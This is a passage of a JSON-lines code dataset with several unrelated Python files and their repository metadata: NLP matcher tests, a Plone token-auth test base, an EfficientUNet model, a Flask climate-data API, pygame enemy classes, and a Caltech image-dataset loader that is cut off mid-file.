None:\n \"\"\"Calling the matcher on a `Doc` object returns matches in expected order.\"\"\"\n matcher = TokenMatcher(nlp.vocab)\n matcher.add(\n \"COMPANY\",\n [\n [\n {\"IS_UPPER\": True, \"OP\": \"+\"},\n {\"IS_PUNCT\": True, \"OP\": \"?\"},\n {\"TEXT\": {\"REGEX\": r\"S\\.\\s?[A-Z]\\.?\\s?[A-Z]?\\.?\"}},\n {\"IS_PUNCT\": True, \"OP\": \"?\"},\n ]\n ],\n )\n doc = nlp(\"My company is called LARGO AND MARMG S.L.\")\n matches = matcher(doc)\n assert doc[matches[0][1] : matches[0][2]].text == \"LARGO AND MARMG S.L.\"\n\n\ndef test_matcher_returns_empty_list_if_no_matches(nlp: Language) -> None:\n \"\"\"Calling the matcher on a `Doc` object with no matches returns empty list.\"\"\"\n matcher = TokenMatcher(nlp.vocab)\n matcher.add(\"TEST\", [[{\"TEXT\": {\"FUZZY\": \"blah\"}}]])\n doc = nlp(\"No matches here.\")\n assert matcher(doc) == []\n\n\ndef test_matcher_uses_on_match_callback(matcher: TokenMatcher, doc: Doc) -> None:\n \"\"\"It utilizes callback on match functions passed when called on a Doc object.\"\"\"\n matcher(doc)\n ent_text = [ent.text for ent in doc.ents]\n assert \"Grfield\" in ent_text\n\n\ndef test_pickling_matcher(nlp: Language) -> None:\n \"\"\"It pickles the matcher object.\"\"\"\n matcher = TokenMatcher(nlp.vocab)\n matcher.add(\"NAME\", [[{\"TEXT\": {\"FUZZY\": \"Ridley\"}}, {\"TEXT\": {\"FUZZY\": \"Scott\"}}]])\n bytestring = pickle.dumps(matcher)\n assert type(bytestring) == bytes\n\n\ndef test_unpickling_matcher(nlp: Language) -> None:\n \"\"\"It unpickles the matcher object.\"\"\"\n matcher = TokenMatcher(nlp.vocab)\n matcher.add(\"NAME\", [[{\"TEXT\": {\"FUZZY\": \"Ridley\"}}, {\"TEXT\": {\"FUZZY\": \"Scott\"}}]])\n bytestring = pickle.dumps(matcher)\n matcher = pickle.loads(bytestring)\n doc = nlp(\"Rdley Scot was the director of Alien.\")\n assert matcher(doc) == [\n (\"NAME\", 0, 2, 90, '[{\"TEXT\":{\"FUZZY\":\"Ridley\"}},{\"TEXT\":{\"FUZZY\":\"Scott\"}}]')\n ]\n","repo_name":"gandersen101/spaczz","sub_path":"tests/test_matcher/test_tokenmatcher.py","file_name":"test_tokenmatcher.py","file_ext":"py","file_size_in_byte":6206,"program_lang":"python","lang":"en","doc_type":"code","stars":236,"dataset":"github-code","pt":"57"} +{"seq_id":"521019389","text":"from ftw.tokenauth.permissions import ManageOwnServiceKeys\nfrom ftw.tokenauth.testing import FTW_TOKENAUTH_FUNCTIONAL_TESTING\nfrom ftw.tokenauth.testing import FTW_TOKENAUTH_FUNCTIONAL_ZSERVER_TESTING\nfrom plone import api\nfrom unittest2 import TestCase\nimport transaction\n\n\nclass FunctionalTestCase(TestCase):\n\n layer = FTW_TOKENAUTH_FUNCTIONAL_TESTING\n\n def setUp(self):\n self.portal = self.layer['portal']\n self.request = self.layer['request']\n uf = api.portal.get_tool('acl_users')\n self.plugin = uf['token_auth']\n self.portal.manage_permission(ManageOwnServiceKeys, roles=['Member'])\n transaction.commit()\n\n\nclass FunctionalZServerTestCase(TestCase):\n\n layer = FTW_TOKENAUTH_FUNCTIONAL_ZSERVER_TESTING\n\n def setUp(self):\n self.portal = self.layer['portal']\n self.request = self.layer['request']\n uf = api.portal.get_tool('acl_users')\n self.plugin = uf['token_auth']\n self.portal.manage_permission(ManageOwnServiceKeys, roles=['Member'])\n transaction.commit()\n","repo_name":"4teamwork/ftw.tokenauth","sub_path":"ftw/tokenauth/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"21247813839","text":"import math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass Swish(nn.Module):\n def __init__(self, name=None):\n super().__init__()\n self.name = name\n \n def forward(self,x):\n return x * torch.sigmoid(x)\n \nclass Conv2dSamepadding(nn.Conv2d):\n def __init__(self, in_channels, out_channels, kernel_size, stride=1, dilation=1, groups=1, bias=True, name=None):\n super().__init__(in_channels, out_channels, kernel_size, stride, padding=0, dilation=dilation, groups=groups, bias=bias)\n self.stride = self.stride if len(self.stride) == 2 else [self.stride[0]] * 2\n self.name = name\n \n def forward(self,x):\n input_h, input_w = x.size()[2:]\n kernel_h, kernel_w = self.weight.size()[2:]\n stride_h, stride_w = self.stride\n output_h, output_w = math.ceil(input_h / stride_h), math.ceil(input_w / stride_w)\n pad_h = max((output_h-1) * self.stride[0] + (kernel_h-1) * self.dilation[0]+1 - input_h, 0)\n pad_w = max((output_w-1) * self.stride[1] + (kernel_w-1) * self.dilation[1]+1 - input_w, 0)\n if pad_h > 0 or pad_w > 0:\n x = F.pad(x, [pad_w // 2, pad_w - pad_w // 2, pad_h // 2, pad_h - pad_h // 2])\n return F.conv2d(x, self.weight, self.bias, self.stride, self.padding, self.dilation, self.groups)\n \nclass BatchNorm2d(nn.BatchNorm2d):\n def __init__(self, num_features, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True, name=None):\n super().__init__(num_features, eps=eps, momentum=momentum, affine=affine, track_running_stats=track_running_stats)\n self.name = name\n \ndef drop_connect(inputs, drop_connect_rate, training):\n if not training:\n return inputs\n batch_size = inputs.shape[0]\n keep_prob = 1.0 - drop_connect_rate\n random_tensor = keep_prob\n random_tensor += torch.rand([batch_size, 1, 1, 1], dtype=inputs.dtype, device=inputs.device)\n binary_tensor = torch.floor(random_tensor)\n output = inputs / keep_prob * binary_tensor\n return output\n\nclass MBConvBlock(nn.Module):\n def __init__(self, block_args, global_params, idx):\n super().__init__()\n \n block_name = 'blocks_' + str(idx) + '_'\n \n self.block_args = block_args\n self.batch_norm_momentum = 1 - global_params.batch_norm_momentum\n self.batch_norm_epsilon = global_params.batch_norm_epsilon\n self.has_se = (self.block_args.se_ratio is not None) and (0 < self.block_args.se_ratio <= 1)\n self.id_skip = block_args.id_skip\n \n self.swish = Swish(block_name + '_swish')\n \n # Expansion phase\n in_channels = self.block_args.input_filters\n out_channels = self.block_args.input_filters * self.block_args.expand_ratio\n if self.block_args.expand_ratio != 1:\n self._expand_conv = Conv2dSamepadding(in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=1,\n bias=False,\n name=block_name + 'expansion_conv')\n self._bn0 = BatchNorm2d(num_features=out_channels,\n momentum=self.batch_norm_momentum,\n eps=self.batch_norm_epsilon,\n name=block_name + 'expansion_batch_norm')\n \n # Depth-wise convolution phase\n kernel_size = self.block_args.kernel_size\n strides = self.block_args.strides\n self._depthwise_conv = Conv2dSamepadding(in_channels=out_channels,\n out_channels=out_channels,\n groups=out_channels,\n kernel_size=kernel_size,\n stride=strides,\n bias=False,\n name=block_name + 'depthwise_conv')\n self._bn1 = BatchNorm2d(num_features=out_channels,\n momentum=self.batch_norm_momentum,\n eps=self.batch_norm_epsilon,\n name=block_name + 'depthwise_batch_norm')\n \n # Squeeze and Excitation\n if self.has_se:\n num_squeezed_channels = max(1, int(self.block_args.input_filters * self.block_args.se_ratio))\n self._se_reduce = Conv2dSamepadding(in_channels=out_channels,\n out_channels=num_squeezed_channels,\n kernel_size=1,\n name=block_name + 'se_reduce')\n self._se_expand = Conv2dSamepadding(in_channels=num_squeezed_channels,\n out_channels=out_channels,\n kernel_size=1,\n name=block_name + 'se_expand')\n \n # output phase\n final_output_channels = self.block_args.output_filters\n self._project_conv = Conv2dSamepadding(in_channels=out_channels,\n out_channels=final_output_channels,\n kernel_size=1,\n bias=False,\n name=block_name + 'output_conv')\n self._bn2 = BatchNorm2d(num_features=final_output_channels,\n momentum=self.batch_norm_momentum,\n eps=self.batch_norm_epsilon,\n name=block_name + 'output_batch_norm')\n \n def forward(self, x, drop_connect_rate=None):\n identity = x\n if self.block_args.expand_ratio != 1:\n x = self._expand_conv(x)\n x = self._bn0(x)\n x = self.swish(x)\n \n x = self._depthwise_conv(x)\n x = self._bn1(x)\n x = self.swish(x)\n \n if self.has_se:\n x_squeezed = F.adaptive_avg_pool2d(x,1)\n x_squeezed = self._se_expand(self.swish(self._se_reduce(x_squeezed)))\n x = torch.sigmoid(x_squeezed) * x\n \n x = self._bn2(self._project_conv(x))\n \n input_filters, output_filters = self.block_args.input_filters, self.block_args.output_filters\n if self.id_skip and self.block_args.strides == 1 and input_filters == output_filters:\n if drop_connect_rate:\n x = drop_connect(x, drop_connect_rate=drop_connect_rate, training=self.training)\n x = x + identity\n return x\n \ndef double_conv(in_channels, out_channels):\n return nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(out_channels, out_channels, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True)\n )\n\ndef up_conv(in_channels, out_channels):\n return nn.ConvTranspose2d(in_channels, out_channels, kernel_size=2, stride=2)\n\ndef custom_head(in_channels, out_channels):\n return nn.Sequential(\n nn.Dropout(),\n nn.Linear(in_channels, 512),\n nn.ReLU(inplace=True),\n nn.Dropout(),\n nn.Linear(512, out_channels),\n )\n\nimport re\nfrom collections import namedtuple\n\nGlobalParams = namedtuple('GlobalParams', ['batch_norm_momentum','batch_norm_epsilon', 'dropout_rate','num_classes',\n 'width_coefficient','depth_coefficient', 'depth_divisor', 'min_depth',\n 'drop_connect_rate'])\nGlobalParams.__new__.__defaults__ = (None,) * len(GlobalParams._fields)\n\nBlockArgs = namedtuple('BlockArgs', ['kernel_size', 'num_repeat', 'input_filters', 'output_filters', 'expand_ratio',\n 'id_skip', 'strides', 'se_ratio'])\nBlockArgs.__new__.__defaults__ = (None,) * len(BlockArgs._fields)\n\ndef round_filters(filters, global_params):\n multiplier = global_params.width_coefficient\n divisor = global_params.depth_divisor\n min_depth = global_params.min_depth\n if not multiplier:\n return filters\n \n filters *= multiplier\n min_depth = min_depth or divisor\n new_filters = max(min_depth, int(filters + divisor / 2) // divisor * divisor)\n if new_filters < 0.9 * filters:\n new_filters += divisor\n return int(new_filters)\n\ndef round_repeats(repeats, global_params):\n multiplier = global_params.depth_coefficient\n if not multiplier:\n return repeats\n return int(math.ceil(multiplier * repeats))\n\ndef get_efficientnet_params(model_name, override_params=None):\n params_dict = {'efficientnet-b0': (1.0, 1.0, 224, 0.2)}\n if model_name not in params_dict.keys():\n raise KeyError\n \n width_coefficient, depth_coefficient, _, dropout_rate = params_dict[model_name]\n \n blocks_args = [\n 'r1_k3_s11_e1_i32_o16_se0.25', 'r2_k3_s22_e6_i16_o24_se0.25',\n 'r2_k5_s22_e6_i24_o40_se0.25', 'r3_k3_s22_e6_i40_o80_se0.25',\n 'r3_k5_s11_e6_i80_o112_se0.25', 'r4_k5_s22_e6_i112_o192_se0.25',\n 'r1_k3_s11_e6_i192_o320_se0.25',\n ]\n global_params = GlobalParams(\n batch_norm_momentum=0.99,\n batch_norm_epsilon=1e-3,\n dropout_rate=dropout_rate,\n drop_connect_rate=0.2,\n num_classes=1000,\n width_coefficient=width_coefficient,\n depth_coefficient=depth_coefficient,\n depth_divisor=8,\n min_depth=None)\n \n if override_params:\n global_params = global_params._replace(**override_params)\n \n decoder = BlockDecoder()\n return decoder.decode(blocks_args), global_params\n\nclass BlockDecoder(object):\n \n @staticmethod\n def _decode_block_string(block_string):\n \n assert isinstance(block_string, str)\n ops = block_string.split('_')\n options = {}\n for op in ops:\n splits = re.split(r'(\\d.*)', op)\n if len(splits) >= 2:\n key, value = splits[:2]\n options[key] = value\n if 's' not in options or len(options['s']) != 2:\n raise ValueError('s가 없어?')\n \n return BlockArgs(\n kernel_size = int(options['k']),\n num_repeat = int(options['r']),\n input_filters = int(options['i']),\n output_filters = int(options['o']),\n expand_ratio = int(options['e']),\n id_skip = ('noskip' not in block_string),\n se_ratio = float(options['se']) if 'se' in options else None,\n strides = [int(options['s'][0]), int(options['s'][1])]\n )\n \n def decode(self, string_list):\n \n assert isinstance(string_list, list)\n blocks_args = []\n for block_string in string_list:\n blocks_args.append(self._decode_block_string(block_string))\n return blocks_args\n \nclass EfficientNet(nn.Module):\n \n def __init__(self, block_args_list, global_params):\n super().__init__()\n \n self.block_args_list = block_args_list\n self.global_params = global_params\n \n batch_norm_momentum = 1-self.global_params.batch_norm_momentum\n batch_norm_epsilon = self.global_params.batch_norm_epsilon\n \n in_channels = 3\n out_channels = round_filters(32, self.global_params)\n self._conv_stem = Conv2dSamepadding(in_channels,\n out_channels,\n kernel_size=3,\n stride=2,\n bias=False,\n name='stem_conv')\n self._bn0 = BatchNorm2d(num_features=out_channels,\n momentum=batch_norm_momentum,\n eps=batch_norm_epsilon,\n name='stem_batch_norm')\n self._swish = Swish(name='swish')\n \n idx = 0\n self._blocks = nn.ModuleList([])\n for block_args in self.block_args_list:\n \n block_args = block_args._replace(\n input_filters = round_filters(block_args.input_filters, self.global_params),\n output_filters = round_filters(block_args.output_filters, self.global_params),\n num_repeat = round_repeats(block_args.num_repeat, self.global_params)\n )\n \n self._blocks.append(MBConvBlock(block_args, self.global_params, idx=idx))\n idx += 1\n \n if block_args.num_repeat > 1:\n block_args = block_args._replace(input_filters=block_args.output_filters, strides=1)\n \n for _ in range(block_args.num_repeat - 1):\n self._blocks.append(MBConvBlock(block_args, self.global_params, idx=idx))\n idx += 1\n \n # Head\n in_channels = block_args.output_filters\n out_channels = round_filters(1280, self.global_params)\n self._conv_head = Conv2dSamepadding(in_channels,\n out_channels,\n kernel_size=1,\n bias=False,\n name='head_conv')\n self._bn1 = BatchNorm2d(num_features=out_channels,\n momentum=batch_norm_momentum,\n eps=batch_norm_epsilon,\n name='head_batch_norm')\n \n # Final linear layer\n self.dropout_rate = self.global_params.dropout_rate\n self._fc = nn.Linear(out_channels, self.global_params.num_classes)\n \n def forward(self, x):\n # Stem\n x = self._conv_stem(x)\n x = self._bn0(x)\n x = self._swish(x)\n \n # Blocks\n for idx, block in enumerate(self._blocks):\n drop_connect_rate = self.global_params.drop_connect_rate\n if drop_connect_rate:\n drop_connect_rate *= idx / len(self._blocks)\n x = block(x, drop_connect_rate)\n \n # Head\n x = self._conv_head(x)\n x = self._bn1(x)\n x = self._swish(x)\n \n # Pooling and Dropout\n x = F.adaptive_avg_pool2d(x, 1).squeeze(-1).squeeze(-1)\n if self.dropout_rate > 0:\n x = F.dropout(x, p=self.dropout_rate, training=self.training)\n \n # FC layer\n x = self._fc(x)\n return x\n \n @classmethod\n def from_name(cls, model_name, *, n_classes=1000, pretrained=False):\n return _get_model_by_name(model_name, classes=n_classes, pretrained=pretrained)\n \n @classmethod\n def encoder(cls, model_name, *, pretrained=False):\n model = cls.from_name(model_name, pretrained=pretrained)\n \n class Encoder(nn.Module):\n def __init__(self):\n super().__init__()\n \n self.name = model_name\n \n self.global_params = model.global_params\n \n self.stem_conv = model._conv_stem\n self.stem_batch_norm = model._bn0\n self.stem_swish = Swish(name='stem_swish')\n self.blocks = model._blocks\n self.head_conv = model._conv_head\n self.head_batch_norm = model._bn1\n self.head_swish = Swish(name='head_swish')\n \n def forward(self,x):\n # stem\n x = self.stem_conv(x)\n x = self.stem_batch_norm(x)\n x = self.stem_swish(x)\n \n # blocks\n for idx, block in enumerate(self.blocks):\n drop_connect_rate = self.global_params.drop_connect_rate\n if drop_connect_rate:\n drop_connect_rate *= idx / len(self.blocks)\n x = block(x, drop_connect_rate)\n \n # head\n x = self.head_conv(x)\n x = self.head_batch_norm(x)\n x = self.head_swish(x)\n return x\n \n return Encoder()\n # classmethod custom_head 생략\n \ndef _get_model_by_name(model_name, classes=1000, pretrained=False):\n block_args_list, global_params = get_efficientnet_params(model_name, override_params={'num_classes': classes})\n model = EfficientNet(block_args_list, global_params)\n try:\n if pretrained:\n print('프리트레인?')\n except KeyError as e:\n print(f'Note: Currently model {e} blr blr')\n return model\n\nfrom collections import OrderedDict\n\ndef get_blocks_to_be_concat(model, x):\n shapes = set()\n blocks = OrderedDict()\n hooks = []\n count = 0\n \n def register_hook(module):\n \n def hook(module, input, output):\n try:\n nonlocal count\n if module.name == f'blocks_{count}_output_batch_norm':\n count +=1\n shape = output.size()[-2:]\n if shape not in shapes:\n shapes.add(shape)\n blocks[module.name] = output\n elif module.name == 'head_swish':\n blocks.popitem()\n blocks[module.name] = output\n except AttributeError:\n pass\n if (\n not isinstance(module, nn.Sequential)\n and not isinstance(module, nn.ModuleList)\n and not (module == model)\n ):\n hooks.append(module.register_forward_hook(hook))\n model.apply(register_hook)\n \n model(x)\n \n for h in hooks:\n h.remove()\n return blocks\n\n\nclass EfficientUnet(nn.Module):\n def __init__(self, encoder, out_channels=2, concat_input=True):\n super().__init__()\n \n self.encoder = encoder\n self.concat_input = concat_input\n \n self.up_conv1 = up_conv(self.n_channels, 512)\n self.double_conv1 = double_conv(self.size[0], 512)\n self.up_conv2 = up_conv(512, 256)\n self.double_conv2 = double_conv(self.size[1], 256)\n self.up_conv3 = up_conv(256, 128)\n self.double_conv3 = double_conv(self.size[2], 128)\n self.up_conv4 = up_conv(128, 64)\n self.double_conv4 = double_conv(self.size[3], 64)\n \n if self.concat_input:\n self.up_conv_input = up_conv(64, 32)\n self.double_conv_input = double_conv(self.size[4], 32)\n \n self.final_conv = nn.Conv2d(self.size[5], out_channels, kernel_size=1)\n \n @property\n def n_channels(self):\n # only for efficientnet-b0 version\n return 1280\n \n @property\n def size(self):\n # only for efficientnet-b0 version\n return [592, 296, 152, 80, 35, 32]\n \n def forward(self,x):\n input_ = x\n \n blocks = get_blocks_to_be_concat(self.encoder, x)\n _, x = blocks.popitem()\n \n x = self.up_conv1(x)\n x = torch.cat([x, blocks.popitem()[1]], dim=1)\n x = self.double_conv1(x)\n \n x = self.up_conv2(x)\n x = torch.cat([x, blocks.popitem()[1]], dim=1)\n x = self.double_conv2(x)\n \n x = self.up_conv3(x)\n x = torch.cat([x, blocks.popitem()[1]], dim=1)\n x = self.double_conv3(x)\n \n x = self.up_conv4(x)\n x = torch.cat([x, blocks.popitem()[1]], dim=1)\n x = self.double_conv4(x)\n \n if self.concat_input:\n x = self.up_conv_input(x)\n x = torch.cat([x, input_], dim=1)\n x = self.double_conv_input(x)\n \n x = self.final_conv(x)\n \n return x\n \ndef get_efficientunet_b0(out_channels=2, concat_input=True, pretrained=False):\n encoder = EfficientNet.encoder('efficientnet-b0', pretrained=pretrained)\n model = EfficientUnet(encoder, out_channels=out_channels, concat_input=concat_input)\n return model\n","repo_name":"TransferHee/Heart_Disease","sub_path":"efficientunet.py","file_name":"efficientunet.py","file_ext":"py","file_size_in_byte":20315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"22937034309","text":"import json\nimport numpy as np\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\nimport datetime as dt\n\n#Database setup\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n#Mirror mirror on the wall, can we reflect at all?\nBase = automap_base()\nBase.prepare(engine, reflect=True)\n\n#Saving references to objects\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n#Flask setup\napp = Flask(__name__)\n\n#Flask routes\n@app.route(\"/\")\ndef welcome():\n \"\"\"List availble api routes\"\"\"\n return (\n f\"Available routes:<br>\"\n f\"/api/v1.0/precipitation</a><br>\"\n f\"/api/v1.0/stations</a><br>\"\n f\"/api/v1.0/tobs</a><br>\"\n f\"/api/v1.0/start<br>\"\n f\"/api/v1.0/start/end\"\n )\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n #Create session\n session = Session(engine)\n\n \"\"\"Return a list of dates and precipitation\"\"\"\n #Query all precipitation\n results = session.query(Measurement.date,Measurement.prcp).all()\n\n session.close()\n\n #Convert list of tuples into normal list\n all_dates_prcp = []\n for date, precip in results:\n date_dict = {}\n date_dict[date] = precip\n all_dates_prcp.append(date_dict)\n return jsonify(all_dates_prcp)\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n #Create session\n session = Session(engine)\n\n \"\"\"Return a list of stations\"\"\"\n #Query all stations\n results = session.query(Station.station, Station.name).all()\n\n session.close()\n\n #Convert list of tuples into normal list.\n all_stations = list(np.ravel(results))\n\n return jsonify(all_stations)\n\n#Query for dates and temps from a year from the last data point\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n \"\"\"Return a list of tobs for the last year of data in the table\"\"\"\n query_date = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n\n results = session.query(Measurement.station, Measurement.tobs).\\\n filter(Measurement.date >= query_date).all()\n \n session.close()\n\n # Convert list of tuples into normal list\n all_tobs = list(np.ravel(results))\n\n return jsonify(all_tobs)\n\n#Create function to validate input as a specific date format -- YYYY-MM-DD\ndef validate(date_text):\n try:\n dt.datetime.strptime(date_text, '%Y-%m-%d')\n except ValueError:\n raise ValueError(\"Oops, incorrect date format, should be YYYY-MM-DD\")\n\n#When provided the start date only, calculate the tmin, tavg, & tmax for all date greater than or equal to the start date\n@app.route(\"/api/v1.0/<startDate>\")\ndef temp_date_end(startDate):\n \"\"\"Fetch the tmin, tavg, tmax given a start date, variables provided by the user or a 404 if not.\"\"\"\n\n if isinstance(startDate,str):\n print(f\"A date passed, determine aggregate functions over date range\")\n validate(startDate)\n #Create session\n session = Session(engine)\n\n results = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), \\\n func.max(Measurement.tobs)).filter(Measurement.date >= startDate).first()\n \n session.close()\n\n #Convert to list\n agg_temps = list(np.ravel(results))\n return jsonify(agg_temps)\n return jsonify({\"error\": \"Date(s) not found.\"}), 404\n\n#When provided the start & end date -- separated by \"/\" -- calculate the tmin, tavg, & tmax for selected dates\n@app.route(\"/api/v1.0/<startDate>/<endDate>\")\ndef temp_date_range(startDate,endDate):\n \"\"\"Fetch the tmin, tavg, and tmax given a date range\"\"\"\n\n if isinstance(endDate,str):\n print(f\"Both dates passed, determine the aggregates\")\n validate(startDate)\n validate(endDate)\n\n #Create session\n session = Session(engine)\n\n results = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), \\\n func.max(Measurement.tobs)).filter(Measurement.date >= startDate).filter(Measurement.date <= endDate).first()\n \n session.close()\n\n #Convert to list\n agg_temps = list(np.ravel(results))\n\n return jsonify(agg_temps)\n return jsonify({\"error\": \"Date(s) not found.\"}), 404\n \nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"tlenzmeier58/sqlalchemy_challenge","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"18311237545","text":"import pygame\nfrom random import seed, randint, uniform\n\nfrom help_functions import calculate_unit_vector\n\nclass Enemy():\n \"\"\"class controlls enemys\"\"\"\n def __init__(self, screen, settings):\n \"\"\"create enemy object and load params\"\"\"\n #load image \n self.screen = screen\n self.settings = settings\n self.image = pygame.image.load(settings.image_path + settings.file_prefix + settings.enemy_path)\n self.image_damaged = pygame.image.load(settings.image_path + settings.file_prefix + settings.enemy_damaged_path)\n self.rect = self.image.get_rect()\n #coordinates\n seed()\n self.rect.centerx = randint(0, settings.screen_size[0])\n self.rect.centery = randint(0, settings.screen_size[1])\n self.centerx = float(self.rect.centerx)\n self.centery = float(self.rect.centery)\n #params (hp, speed)\n self.hp = settings.enemy_hp\n self.being_damaged = 0\n self.speed = settings.enemy_speed \n self.damage = settings.enemy_damage\n\n def show(self):\n \"\"\"show enemy\"\"\" \n if self.being_damaged > 0:\n self.screen.blit(self.image_damaged, self.rect)\n self.being_damaged -= 1\n else:\n self.screen.blit(self.image, self.rect) \n\n def take_damage(self, damage):\n \"\"\"take famage from bullet\"\"\"\n self.hp -= damage\n self.being_damaged = self.settings.damage_frame_time\n\n def update(self, ship):\n \"\"\"move enemy\"\"\"\n #search hero ship\n move_vector = calculate_unit_vector(self.centerx, self.centery, ship.centerx + uniform(-10, 10), ship.centery + uniform(-10, 10))\n self.centerx += move_vector[0] * self.speed\n self.centery += move_vector[1] * self.speed\n self.rect.centerx = self.centerx\n self.rect.centery = self.centery\n\nclass EnemyFast(Enemy):\n \"\"\"faster enemy class\"\"\"\n def __init__(self, screen, settings):\n super().__init__(screen, settings)\n self.hp = settings.enemy_hp / 2\n self.speed = settings.enemy_speed * 2\n self.image = pygame.transform.rotozoom(self.image, 0, 0.5)\n self.image_damaged = pygame.transform.rotozoom(self.image_damaged, 0, 0.5)\n self.rect = self.image.get_rect()\n\nclass EnemyFat(Enemy):\n \"\"\"bigger enemy class\"\"\"\n def __init__(self, screen, settings):\n super().__init__(screen, settings)\n self.hp = settings.enemy_hp * 2\n self.speed = settings.enemy_speed / 0.75\n self.image = pygame.transform.rotozoom(self.image, 0, 1.5)\n self.image_damaged = pygame.transform.rotozoom(self.image_damaged, 0, 1.5)\n self.rect = self.image.get_rect()\n\nclass EnemyBoss(Enemy):\n \"\"\"boss enemy class\"\"\"\n def __init__(self, screen, settings):\n super().__init__(screen, settings)\n self.hp = settings.enemy_hp * 10\n self.speed = settings.enemy_speed / 0.75\n self.image = pygame.transform.rotozoom(self.image, 0, 3)\n self.image_damaged = pygame.transform.rotozoom(self.image_damaged, 0, 3)\n self.rect = self.image.get_rect()\n def update(self, ship):\n pass\n","repo_name":"pinguingman/swiborg-shoot","sub_path":"enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"10093669526","text":"import cPickle\nimport os\nfrom os import path\nimport shutil\nfrom glob import glob\nimport hashlib\n\nimport numpy as np\n\nimport larray\nfrom data_home import get_data_home\nfrom utils import download, extract, int_labels\nfrom utils.image import ImgLoader\n\n\nclass BaseCaltech(object):\n \"\"\"Caltech Object Dataset\n\n Attributes\n ----------\n meta: list of dict\n Metadata associated with the dataset. For each image with index i,\n meta[i] is a dict with keys:\n name: str\n Name of the individual's face in the image.\n filename: str\n Full path to the image.\n id: int\n Identifier of the image.\n sha1: str\n SHA-1 hash of the image.\n\n Notes\n -----\n If joblib is available, then `meta` will be cached for faster\n processing. To install joblib use 'pip install -U joblib' or\n 'easy_install -U joblib'.\n \"\"\"\n\n def __init__(self, meta=None, seed=0, ntrain=15, ntest=15, num_splits=10):\n\n self.seed = seed\n self.ntrain = ntrain\n self.ntest = ntest\n self.num_splits = num_splits\n\n if meta is not None:\n self._meta = meta\n\n self.name = self.__class__.__name__\n\n try:\n from joblib import Memory\n mem = Memory(cachedir=self.home('cache'))\n self._get_meta = mem.cache(self._get_meta)\n except ImportError:\n pass\n\n def home(self, *suffix_paths):\n return path.join(get_data_home(), self.name, *suffix_paths)\n\n # ------------------------------------------------------------------------\n # -- Dataset Interface: fetch()\n # ------------------------------------------------------------------------\n\n def fetch(self, download_if_missing=True):\n \"\"\"Download and extract the dataset.\"\"\"\n\n home = self.home()\n\n if not download_if_missing:\n raise IOError(\"'%s' exists!\" % home)\n\n # download archive\n url = self.URL\n sha1 = self.SHA1\n basename = path.basename(url)\n archive_filename = path.join(home, basename)\n if not path.exists(archive_filename):\n if not download_if_missing:\n return\n if not path.exists(home):\n os.makedirs(home)\n download(url, archive_filename, sha1=sha1)\n\n # extract it\n if not path.exists(self.home(self.SUBDIR)):\n extract(archive_filename, home, sha1=sha1, verbose=True)\n\n # ------------------------------------------------------------------------\n # -- Dataset Interface: meta\n # ------------------------------------------------------------------------\n\n @property\n def meta(self):\n if not hasattr(self, '_meta'):\n self.fetch(download_if_missing=True)\n self._meta = self._get_meta()\n self.names = sorted(os.listdir(self.home(self.SUBDIR)))\n return self._meta\n\n def _get_meta(self):\n try:\n rval = cPickle.load(\n open(\n self.home(self.SUBDIR + '.meta.pkl')))\n open(rval[0]['filename'])\n return rval\n except IOError:\n # IOError may come either from a missing pkl file\n # or from a missing image (rval[0]['filename']) but in both\n # cases the response is to rebuild the metadata\n names = sorted(os.listdir(self.home(self.SUBDIR)))\n\n meta = []\n ind = 0\n\n for name in names:\n\n pattern = self.home(self.SUBDIR, name, '*.jpg')\n\n img_filenames = sorted(glob(pattern))\n\n for img_filename in img_filenames:\n img_data = open(img_filename, 'rb').read()\n sha1 = hashlib.sha1(img_data).hexdigest()\n\n data = dict(name=name,\n id=ind,\n filename=img_filename,\n sha1=sha1)\n\n meta.append(data)\n ind += 1\n\n cPickle.dump(\n meta,\n open(self.home(self.SUBDIR + '.meta.pkl'), 'w'))\n\n return meta\n\n @property\n def splits(self):\n \"\"\"\n generates splits and attaches them in the \"splits\" attribute\n\n \"\"\"\n if not hasattr(self, '_splits'):\n seed = self.seed\n ntrain = self.ntrain\n ntest = self.ntest\n num_splits = self.num_splits\n self._splits = self.generate_splits(seed, ntrain,\n ntest, num_splits)\n return self._splits\n\n def generate_splits(self, seed, ntrain, ntest, num_splits):\n meta = self.meta\n ntrain = self.ntrain\n ntest = self.ntest\n rng = np.random.RandomState(seed)\n splits = {}\n for split_id in range(num_splits):\n splits['train_' + str(split_id)] = []\n splits['test_' + str(split_id)] = []\n for name in self.names:\n cat = [m for m in meta if m['name'] == name]\n L = len(cat)\n assert L >= ntrain + ntest, 'category %s too small' % name\n perm = rng.permutation(L)\n for ind in perm[:ntrain]:\n splits['train_' + str(split_id)].append(cat[ind]['id'])\n for ind in perm[ntrain: ntrain + ntest]:\n splits['test_' + str(split_id)].append(cat[ind]['id'])\n return splits\n\n # 